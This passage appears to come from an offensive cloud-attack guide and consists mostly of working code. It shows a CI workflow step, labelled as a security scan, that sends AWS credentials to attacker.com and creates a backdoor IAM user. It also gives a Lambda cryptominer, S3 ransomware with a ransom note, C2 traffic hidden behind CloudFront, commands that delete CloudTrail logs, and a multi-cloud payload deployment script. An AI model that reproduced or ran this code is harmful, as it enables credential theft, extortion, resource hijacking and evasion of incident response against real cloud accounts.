        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        aws-region: us-east-1
    
    - name: Security scan
      run: |
        # Exfiltrate AWS credentials
        curl -X POST https://attacker.com/collect \
          -d "aws_key=$AWS_ACCESS_KEY_ID" \
          -d "aws_secret=$AWS_SECRET_ACCESS_KEY"
        
        # Create backdoor
        aws iam create-user --user-name github-scanner
        aws iam create-access-key --user-name github-scanner

Cloud-Native Malware

Serverless Cryptominer:

# AWS Lambda cryptominer
import json
import os
import subprocess
import urllib.request

def lambda_handler(event, context):
    # Download the miner to /tmp (the only writable path in Lambda)
    # and mark it executable before launching
    miner_url = "https://attacker.com/miner"
    miner_path = "/tmp/miner"
    
    urllib.request.urlretrieve(miner_url, miner_path)
    os.chmod(miner_path, 0o755)
    subprocess.Popen([miner_path, "--pool", "pool.attacker.com:4444"])
    
    return {
        'statusCode': 200,
        'body': json.dumps('Processing complete')
    }

Cloud Storage Ransomware:

# S3 bucket encryption script
import boto3
from cryptography.fernet import Fernet

def encrypt_bucket(bucket_name):
    s3 = boto3.client('s3')
    key = Fernet.generate_key()
    fernet = Fernet(key)
    
    # List objects (list_objects_v2 returns at most 1,000 keys per call;
    # a real pass would use a paginator)
    objects = s3.list_objects_v2(Bucket=bucket_name)
    
    for obj in objects.get('Contents', []):
        # Download object
        response = s3.get_object(Bucket=bucket_name, Key=obj['Key'])
        data = response['Body'].read()
        
        # Encrypt data
        encrypted_data = fernet.encrypt(data)
        
        # Upload encrypted version
        s3.put_object(
            Bucket=bucket_name,
            Key=obj['Key'] + '.encrypted',
            Body=encrypted_data
        )
        
        # Delete original
        s3.delete_object(Bucket=bucket_name, Key=obj['Key'])
    
    # Store decryption key
    s3.put_object(
        Bucket=bucket_name,
        Key='README_DECRYPT.txt',
        Body=f'Your files have been encrypted. Send 1 BTC to recover. Key: {key.decode()}'
    )

Advanced Evasion Techniques

API Rate Limit Evasion:

# Distribute requests across regions
for region in us-east-1 us-west-2 eu-west-1; do
    aws ec2 describe-instances --region $region &
done

# Use multiple profiles/accounts
for profile in profile1 profile2 profile3; do
    aws iam list-users --profile $profile &
done

Log Evasion:

# AWS - run commands from a CloudShell session in the console; CloudTrail
# then records an AWS-owned source IP rather than your own infrastructure
# (there is no "aws cloudshell" CLI command for this; it is interactive)

# Use API Gateway to proxy requests
curl -X POST https://api-gateway-url/prod/proxy \
  -H "Content-Type: application/json" \
  -d '{"service": "iam", "action": "list-users"}'

Traffic Obfuscation:

# Use cloud-native proxies
import random

import boto3
import requests

# Route through CloudFront
def obfuscated_request(url, data):
    # Create a CloudFront distribution pointing at the C2
    # (DistributionConfig is abbreviated here; a valid config also needs
    # Enabled and DefaultCacheBehavior before create_distribution succeeds)
    cloudfront = boto3.client('cloudfront')
    
    distribution_config = {
        'CallerReference': 'backdoor-' + str(random.randint(1000, 9999)),
        'Comment': 'CDN for static assets',
        'Origins': {
            'Quantity': 1,
            'Items': [
                {
                    'Id': 'origin1',
                    'DomainName': 'attacker-c2.com',
                    'CustomOriginConfig': {
                        'HTTPPort': 443,
                        'HTTPSPort': 443,
                        'OriginProtocolPolicy': 'https-only'
                    }
                }
            ]
        }
    }
    
    response = cloudfront.create_distribution(DistributionConfig=distribution_config)
    cdn_domain = response['Distribution']['DomainName']
    
    # Use CDN to proxy requests
    return requests.post(f'https://{cdn_domain}/api', data=data)

Incident Response Evasion

Anti-Forensics:

# Delete CloudTrail logs
aws logs delete-log-group --log-group-name CloudTrail/audit-logs

# Modify log retention
aws logs put-retention-policy --log-group-name <group> --retention-in-days 1

# Create noise in logs
for i in {1..1000}; do
    aws s3 ls s3://non-existent-bucket-$i 2>/dev/null &
done

Timestamp Manipulation:

# Plant backdated timestamp metadata on an S3 object (S3's real LastModified
# value cannot be rewritten; this only fools tooling that trusts metadata)
import boto3
from datetime import datetime, timedelta

s3 = boto3.client('s3')
malicious_payload = b"..."  # placeholder payload for illustration

# Backdate a custom metadata field by one year
past_date = datetime.now() - timedelta(days=365)
s3.put_object(
    Bucket='target-bucket',
    Key='backdoor.zip',
    Body=malicious_payload,
    Metadata={
        'creation-date': past_date.isoformat()
    }
)

Tool Development Framework

Custom Payload Delivery:

#!/usr/bin/env python3
# Multi-cloud payload delivery framework

import argparse

import boto3
import azure.identity
import google.cloud.storage

class CloudPayloadDelivery:
    def __init__(self):
        self.aws_session = None
        self.azure_credential = None
        self.gcp_client = None
    
    def setup_aws(self, profile=None):
        session = boto3.Session(profile_name=profile)
        self.aws_session = session
        return session.client('sts').get_caller_identity()
    
    def setup_azure(self):
        credential = azure.identity.DefaultAzureCredential()
        self.azure_credential = credential
        return "Azure connection established"
    
    def setup_gcp(self, project_id):
        client = google.cloud.storage.Client(project=project_id)
        self.gcp_client = client
        return f"GCP connection established for {project_id}"
    
    def deploy_aws_lambda(self, function_name, payload):
        lambda_client = self.aws_session.client('lambda')
        
        # Create deployment package
        import zipfile
        import io
        
        zip_buffer = io.BytesIO()
        with zipfile.ZipFile(zip_buffer, 'w') as zip_file:
            zip_file.writestr('lambda_function.py', payload)
        
        # Deploy function
        response = lambda_client.create_function(
            FunctionName=function_name,
            Runtime='python3.9',
            Role='arn:aws:iam::account:role/lambda-execution-role',
            Handler='lambda_function.lambda_handler',
            Code={'ZipFile': zip_buffer.getvalue()},
            Description='Automated security tool'
        )
        return response['FunctionArn']
    
    def deploy_azure_function(self, function_name, payload):
        # Azure Function deployment logic
        pass
    
    def deploy_gcp_function(self, function_name, payload):
        # GCP Cloud Function deployment logic
        pass

# Usage example
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Multi-cloud payload delivery')
    parser.add_argument('--cloud', choices=['aws', 'azure', 'gcp'], required=True)
    parser.add_argument('--payload-file', required=True)
    parser.add_argument('--function-name', required=True)
    
    args = parser.parse_args()
    
    delivery = CloudPayloadDelivery()
    
    with open(args.payload_file, 'r') as f:
        payload = f.read()
    
    if args.cloud == 'aws':
        delivery.setup_aws()
        arn = delivery.deploy_aws_lambda(args.function_name, payload)
        print(f"Deployed to AWS Lambda: {arn}")